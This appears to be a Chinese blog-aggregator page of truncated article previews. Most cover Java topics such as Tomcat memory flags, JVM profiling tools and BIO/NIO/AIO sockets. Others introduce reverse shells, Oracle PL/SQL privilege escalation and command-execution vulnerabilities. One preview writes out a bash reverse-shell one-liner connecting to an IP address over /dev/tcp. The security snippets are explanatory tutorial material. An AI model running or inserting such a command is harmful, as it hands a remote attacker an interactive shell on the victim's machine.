IDEA运行tomcat,总是出现这个错误. 解决: 在tomcat的配置里,加上下面这句话: -Xms256m -Xmx512m -XX:MaxNewSize=64m -XX:MaxPermSize=128m…

小a和小b来到了一条布满了黄金的街道上.它们想要带几块黄金回去,然而这里的城管担心他们拿走的太多,于是要求小a和小b通过做一个游戏来决定最后得到的黄金的数量.游戏规则是这样的:假设道路长度为米(左端点为,右端点为),同时给出一个数(下面会提到的用法)设小a初始时的黄金数量为,小b初始时的黄金数量为小a从出发走向,小b从出发走向,两人的速度均为假设某一时刻(必须为整数)小a的位置为,小b的位置为,若且,那么小a的黄金数量会变为,小b的黄金数量会变为当小a到达时游戏结束小a想知道在游戏结束时的值答案…

反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹.假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接.远程桌面,web服务,ssh,telnet等等,都是正向连接. 那么什么情况下正向连接不太好用了呢?1.某客户机中了你的网马,但是它在局域网内,你直接连接不了.它的ip会动态改变,你不能持续控制.2.由于防火墙等限制,对方机器只能发送请求,不能接收请求.3.对于病毒,木马,…

JVM分析工具有很多; jdk自带工具:jconsole.jvisualvm 其他工具:jprofile ,yourkit等 不要在线上用,影响性能,在测试环境中使用. 一.jconsole ——jdk自带工具分析  内存监控——内存”页签相当于可视化的jstat命令的话 1.没有任何操作,内存还在上升,why??? rmi协议导致的,rmi通信的时候会产生一些对象,所以这里内存会上升,可以点击右上角的绿色那个,断开rmi连接,就不会增长了. 执行gc这里是full-gc,系统调用都是full-…

一.执行java代码 简介 oracle提权漏洞集中存在于PL/SQL编写的函数.存储过程.包.触发器中.oracle存在提权漏洞的一个重要原因是PL/SQL定义的两种调用权限导致(定义者权限和调用者权限).定义者权限给了低权限用户在特定时期拥有高权限的可能,这就给提权操作奠定了基础. 即无论调用者权限如何,执行存储过程的结果权限永远为定义者的权限.因此,如果一个较高权限的用户定义了存储过程,并赋予了低权限用户调用权限,较低权限的用户即可利用这个存储过程提权. Java具有一组非常强大的标准库,…

反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其命令行的输入输出转到控制端,从而实现交互. bash root# bash -i >& /dev/tcp/192.168.31.41/8080 0>&1 bash -i 就是打开一个交互式的shell,输入命令回显给用户: /dev/tcp/是Linux中的一个特殊设备…

CODE EXECUTION VULNS Allows an attacker to execute OS commands. Windows or Linux commands. Can be used to get a reverse shell. Or upload any file using wget command. Code execution commands attached in the resources. The following examples assums the…

Java中的IO操作可谓常见.在Java的IO体系中,常有些名词容易让人困惑不解.为此,先通俗地介绍下这些名词. 1 什么是同步? 2 什么是异步? 3 什么是阻塞? 4 什么是非阻塞? 5 什么是同步阻塞? 6 什么是同步非阻塞? 7 什么是异步阻塞? 8 什么是异步非阻塞? 我们先来弄明白什么是同步,异步,阻塞,非阻塞,只有这几个概念理解清楚了,然后再组合起来理解,就相对比较容易了. 同步和异步是针对应用程序和内核的交互方式而言的. 阻塞和非阻塞是针对于进程在访问数据的时候,根据IO操作的就…

最近在做socket通信,最开始是基于Bio开发(其实开发的时候也不知道这种是基于BIO).但是问题来了,客户端发的报文,服务端接收会少,为了解决问题,只能恶补一下相关知识. 服务端: import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.OutputStream; import…

这里,我将做一个简单的通信程序,分别使用三种原始的通信工具:BIO,NIO,AIO. 功能就是一个服务器,一个客户端.服务器就是处理请求,返回响应.而客户端就是连接服务器,发送请求,接收响应. 第一步:建立通信接口 import java.util.Date; public class Test { public static void main(String[] args) { new Test().test(); } private static final long time = new…